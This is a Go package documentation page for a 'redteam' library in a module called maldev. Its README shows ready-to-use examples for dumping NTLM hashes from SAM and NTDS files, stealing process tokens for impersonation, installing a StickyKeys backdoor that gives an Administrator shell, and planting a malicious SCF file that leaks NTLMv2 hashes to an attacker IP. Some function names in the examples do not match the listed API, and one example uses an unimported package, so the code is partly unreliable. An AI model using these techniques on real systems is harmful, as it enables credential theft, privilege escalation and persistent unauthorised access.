redteam

package
v0.1.2 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Feb 3, 2023 License: MIT Imports: 14 Imported by: 0

README

Red Team Examples

Dump system hashes (different ways)

  • This functions use gosecretsdump which is really fast and can NTLM dump hashes with a lot of config options
package main

import (
  "fmt"

  "github.com/D3Ext/maldev/redteam"
)

func main(){
  // First way (using SAM and SYSTEM)
  hashes1, err := redteam.DumpSamHashes("C:\\path\\to\\system", "C:\\path\\to\\sam")
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(hashes1)

  // Second way (using NTDS and SYSTEM)
  hashes2, err := redteam.DumpNtdsHashes("C:\\path\\to\\system", "C:\\path\\to\\ntds")
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(hashes2)

  // Third way (automated mode)
  hashes3, err := redteam.AutoHashDump()
  if err != nil {
    log.Fatal(err)
  }
  fmt.Println(hashes3)

}

Steal process token (impersonation)

package main

import (
  "log"

  "github.com/D3Ext/maldev/redteam"
)

func main(){

  pid := 1234 // Set PID to steal
  token, err := redteam.Impersonate(pid) // Returns error if user doesn't have privileges
  if err != nil {
    log.Fatal(err)
  }
}

StickyKeys backdoor

  • This function replaces the sethc.exe binary with a cmd.exe so when you press SHIFT 3 times it launches a terminal as Administrator. It also creates a backup of the sethc.exe binary so you also can use the RevertStickyKeys()
package main

import (
  "fmt"
  "log"

  "github.com/D3Ext/maldev/redteam"
)

func main(){
  err := redteam.StickyKeys()
  if err != nil {
    log.Fatal(err)
  }

  fmt.Println("Backdoor added successfully!")

  err = redteam.RevertStickyKeys()
  if err != nil {
    log.Fatal(err)
  }

  fmt.Println("Backdoor reverted!")
}

Create malicious SCF

  • With this function you can create a malicious SCF file to obtain NTLMv2 hashes once a user opens the SMB share
package main

import (
  "log"

  "github.com/D3Ext/maldev/redteam"
)

func main(){
  path := "C:\\Path\\To\\Smb\\Share\\malicious.scf" // Path with filename where SCF file will be stored
  ip := "192.168.1.37" // Attacker ip, if a responder is running you will receive NTLMv2 hashes

  err := redteam.CreateScf(path, ip)
  if err != nil {
    log.Fatal(err)
  }
}

Documentation

Index

Constants

This section is empty.

Variables

This section is empty.

Functions

func CreateScf 

func CreateScf(filepath string, attacker_ip string) error

func GetToken 

func GetToken() (windows.Token, error)

func Impersonate 

func Impersonate(pid int) (windows.Token, error)

func RevertStickyKeys 

func RevertStickyKeys() error

func StickyKeys 

func StickyKeys() error

Types

type Hash 

type Hash struct {
	Username string
	LM       []byte
	NT       []byte
	Rid      uint32
	Enabled  bool
	Supp     ditreader.SuppInfo
}

func AutoDumpHashes 

func AutoDumpHashes() ([]Hash, error)

func DumpDitHashes 

func DumpDitHashes(system_file string, ntds_file string) ([]Hash, error)

func DumpSamHashes 

func DumpSamHashes(system_file string, sam_file string) ([]Hash, error)

func (Hash) Format 

func (h Hash) Format() string

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.